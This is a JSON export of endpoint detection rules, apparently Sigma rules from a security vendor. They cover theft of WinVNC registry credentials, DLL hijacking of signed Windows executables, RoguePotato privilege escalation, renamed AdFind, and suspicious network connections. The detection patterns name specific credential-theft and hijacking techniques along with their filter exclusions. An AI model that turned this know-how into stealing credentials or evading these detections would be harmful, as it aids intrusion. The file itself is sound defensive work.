],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6290450e-94a3-43da-b84f-60b26a682603",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095524Z",
"creation_date": "2026-03-23T11:45:34.095526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095530Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://juggernaut-sec.com/password-hunting/",
"https://attack.mitre.org/techniques/T1552/002/"
],
"name": "t1003_002_susp_registry_read_winvnc_secret.yml",
"content": "title: WinVNC Secrets Read from Registry\nid: 6290450e-94a3-43da-b84f-60b26a682603\ndescription: |\n Detects a suspicious read operation on registry keys storing WinVNC configuration.\n Adversaries may attempt to steal sensitive information, such as credentials, stored in the WinVNC configuration to facilitate lateral movement within the network.\n WinVNC is a Virtual Network Computing (VNC) server that allows remote desktop access, and its configuration registry keys often contain sensitive details like authentication credentials.\n Unauthorized access to these keys could indicate an attempt to gather information for lateral traversal or persistence.\n It is recommended to investigate the process attempting to access the registry keys to determine if it is legitimate and check for any related suspicious activity that may indicate a broader compromise.\nreferences:\n - https://juggernaut-sec.com/password-hunting/\n - https://attack.mitre.org/techniques/T1552/002/\ndate: 2024/04/02\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith: 'HKU\\\\*\\SOFTWARE\\ORL\\WINVNC3\\PASSWORD\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6290450e-94a3-43da-b84f-60b26a682603",
"rule_name": "WinVNC Secrets Read from Registry",
"rule_description": "Detects a suspicious read operation on registry keys storing WinVNC configuration.\nAdversaries may attempt to steal sensitive information, such as credentials, stored in the WinVNC configuration to facilitate lateral movement within the network.\nWinVNC is a Virtual Network Computing (VNC) server that allows remote desktop access, and its configuration registry keys often contain sensitive details like authentication credentials.\nUnauthorized access to these keys could indicate an attempt to gather information for lateral traversal or persistence.\nIt is recommended to investigate the process attempting to access the registry keys to determine if it is legitimate and check for any related suspicious activity that may indicate a broader compromise.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1012",
"attack.t1552.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "62c61440-0b70-41cf-8210-be55bac993e6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090916Z",
"creation_date": "2026-03-23T11:45:34.090918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090923Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_easeofaccessdialog.yml",
"content": "title: DLL Hijacking via easeofaccessdialog.exe\nid: 62c61440-0b70-41cf-8210-be55bac993e6\ndescription: |\n Detects potential Windows DLL Hijacking via easeofaccessdialog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'easeofaccessdialog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\duser.dll'\n - '\\OLEACC.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "62c61440-0b70-41cf-8210-be55bac993e6",
"rule_name": "DLL Hijacking via easeofaccessdialog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via easeofaccessdialog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63646426-5eeb-41c6-9946-60688b3bd242",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094631Z",
"creation_date": "2026-03-23T11:45:34.094633Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094637Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_baaupdate.yml",
"content": "title: DLL Hijacking via baaupdate.exe\nid: 63646426-5eeb-41c6-9946-60688b3bd242\ndescription: |\n Detects potential Windows DLL Hijacking via baaupdate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'baaupdate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FVEAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63646426-5eeb-41c6-9946-60688b3bd242",
"rule_name": "DLL Hijacking via baaupdate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via baaupdate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63982e43-6786-48d8-a87f-b89846a973a9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610350Z",
"creation_date": "2026-03-23T11:45:34.610354Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610361Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/antonioCoco/RoguePotato/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_rogue_potato_named_pipe.yml",
"content": "title: RoguePotato Named Pipe Created\nid: 63982e43-6786-48d8-a87f-b89846a973a9\ndescription: |\n Detects the creation of a named pipe related to the RoguePotato privilege escalation tool.\n RoguePotato is a privilege escalation tool that fakes an OXID resolver to force the BITS service to authenticate and steal its token.\n It is recommended to investigate the process that created the named pipe and its potential child processes, as well as processes that connected to the named pipe.\nreferences:\n - https://github.com/antonioCoco/RoguePotato/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/02/05\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.NamedPipe\n - classification.Windows.HackTool.RoguePotato\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName|endswith: '\\pipe\\epmapper'\n\n filter_epmapper:\n PipeName: '\\pipe\\epmapper'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63982e43-6786-48d8-a87f-b89846a973a9",
"rule_name": "RoguePotato Named Pipe Created",
"rule_description": "Detects the creation of a named pipe related to the RoguePotato privilege escalation tool.\nRoguePotato is a privilege escalation tool that fakes an OXID resolver to force the BITS service to authenticate and steal its token.\nIt is recommended to investigate the process that created the named pipe and its potential child processes, as well as processes that connected to the named pipe.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63a7d949-9fde-46be-a6fd-f97306f8447c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600721Z",
"creation_date": "2026-03-23T11:45:34.600725Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600733Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_smstore.yml",
"content": "title: DLL Hijacking via symstore.exe\nid: 63a7d949-9fde-46be-a6fd-f97306f8447c\ndescription: |\n Detects potential Windows DLL Hijacking via symstore.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/09\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'symstore.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\symsrv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Windows Kits\\\\*\\Debuggers\\'\n - '?:\\Program Files (x86)\\Windows Kits\\\\*\\Debuggers\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Windows Kits\\\\*\\Debuggers\\'\n - '?:\\Program Files (x86)\\Windows Kits\\\\*\\Debuggers\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63a7d949-9fde-46be-a6fd-f97306f8447c",
"rule_name": "DLL Hijacking via symstore.exe",
"rule_description": "Detects potential Windows DLL Hijacking via symstore.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63b8bd32-635b-4502-9608-767c742d73d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084233Z",
"creation_date": "2026-03-23T11:45:34.084236Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084240Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://www.joeware.net/freetools/tools/adfind/",
"https://attack.mitre.org/software/S0552/",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "adfind_renamed_binary.yml",
"content": "title: Renamed AdFind Binary Executed\nid: 63b8bd32-635b-4502-9608-767c742d73d3\ndescription: |\n Detects the execution of a renamed AdFind binary.\n AdFind is a legitimate tool that has been used by numerous threat actors for conducting enumeration in an Active Directory network. Sometimes, this binary is renamed to avoid detection.\n It is recommended to determine if this binary is expected to be used in your environment and check for other suspicious commands by the parent process.\nreferences:\n - http://www.joeware.net/freetools/tools/adfind/\n - https://attack.mitre.org/software/S0552/\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1016/\ndate: 2020/12/15\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.002\n - attack.t1018\n - attack.t1016\n - attack.s0552\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AdFind\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.ActiveDirectory\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'AdFind.exe'\n\n filter_name:\n Image|endswith: '\\AdFind.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63b8bd32-635b-4502-9608-767c742d73d3",
"rule_name": "Renamed AdFind Binary Executed",
"rule_description": "Detects the execution of a renamed AdFind binary.\nAdFind is a legitimate tool that has been used by numerous threat actors for conducting enumeration in an Active Directory network. Sometimes, this binary is renamed to avoid detection.\nIt is recommended to determine if this binary is expected to be used in your environment and check for other suspicious commands by the parent process.\n",
"rule_creation_date": "2020-12-15",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016",
"attack.t1018",
"attack.t1069.002",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63e4dfcd-2a85-484f-8502-c6aa4f0b1e1f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588350Z",
"creation_date": "2026-03-23T11:45:34.588354Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588361Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/",
"https://attack.mitre.org/techniques/T1071/"
],
"name": "t1071_suspicious_network_connection_from_legitimate_process.yml",
"content": "title: Suspicious Network Activity from Legitimate Process\nid: 63e4dfcd-2a85-484f-8502-c6aa4f0b1e1f\ndescription: |\n Detects suspicious network activity initiated by a process that should not be network-active.\n Attackers can inject code or masquerade malware as legitimate processes that will perform network connections to their C2 server.\n Processes mentioned in this rule are not known to legitimately perform network connections.\n It is recommended to analyze the process performing the network connection for possible injection, as well as to analyze the parent and child processes for malicious content or actions.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\n - https://attack.mitre.org/techniques/T1071/\ndate: 2023/02/06\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessImage|endswith:\n - '\\ApplicationFrameHost.exe'\n - '\\audiodg.exe'\n - '\\calc.exe'\n - '\\csrss.exe'\n - '\\dwm.exe'\n - '\\fontdrvhost.exe'\n - '\\MediaAggreService.exe'\n - '\\SecurityHealthService.exe'\n - '\\SecurityHealthSystray.exe'\n - '\\SgrmBroker.exe'\n - '\\sihost.exe'\n - '\\smss.exe'\n - '\\Taskmgr.exe'\n - '\\regsvr32.exe'\n - '\\msxsl.exe'\n\n filter_linklocal_ipv6:\n SourceIp: 'fe80::*'\n DestinationIp: 'fe80::*'\n\n filter_linklocal_ipv4:\n # Ne need to check source IP when destination is a local address\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - '100.64.0.0/10' # RFC6598\n\n exclusion_sihost:\n ProcessImage: '?:\\Windows\\System32\\sihost.exe'\n ProcessParentCommandLine: '?:\\windows\\system32\\svchost.exe -k netsvcs -p -s UserManager'\n\n exclusion_task_manager1:\n ProcessImage: '?:\\Windows\\System32\\Taskmgr.exe'\n ProcessCommandLine:\n # Right click on the Taskbar and click 'Start task Manager'\n - '?:\\WINDOWS\\system32\\taskmgr.exe /4'\n # Start Menu, click ‘Task Manager’\n - '?:\\WINDOWS\\system32\\taskmgr.exe /7'\n ProcessParentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_task_manager2:\n ProcessCommandLine:\n # Press CTRL+SHIFT+ESC\n - '?:\\Windows\\System32\\Taskmgr.exe /2'\n # Press CTRL+ALT+DEL, click 'Start Task Manager'\n - '?:\\WINDOWS\\System32\\Taskmgr.exe /3'\n ProcessParentImage:\n - '?:\\Windows\\System32\\LaunchTM.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_rshell:\n ProcessCommandLine: 'regsvr32.exe -s -u RShellEx.dll'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_microsoft:\n ProcessCommandLine: '?:\\Windows\\System32\\SecurityHealthService.exe'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\services.exe'\n # graph.microsoft.com\n\n exclusion_applicationframeHost:\n ProcessImage: '?:\\Windows\\System32\\ApplicationFrameHost.exe'\n ProcessParentCommandLine: '?:\\windows\\system32\\svchost.exe -k DcomLaunch -p'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63e4dfcd-2a85-484f-8502-c6aa4f0b1e1f",
"rule_name": "Suspicious Network Activity from Legitimate Process",
"rule_description": "Detects suspicious network activity initiated by a process that should not be network-active.\nAttackers can inject code or masquerade malware as legitimate processes that will perform network connections to their C2 server.\nProcesses mentioned in this rule are not known to legitimately perform network connections.\nIt is recommended to analyze the process performing the network connection for possible injection, as well as to analyze the parent and child processes for malicious content or actions.\n",
"rule_creation_date": "2023-02-06",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63f75270-bccf-4f9a-a525-1b0a4520eda4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619576Z",
"creation_date": "2026-03-23T11:45:34.619578Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619582Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_network_sniffing_tcpdump_macos.yml",
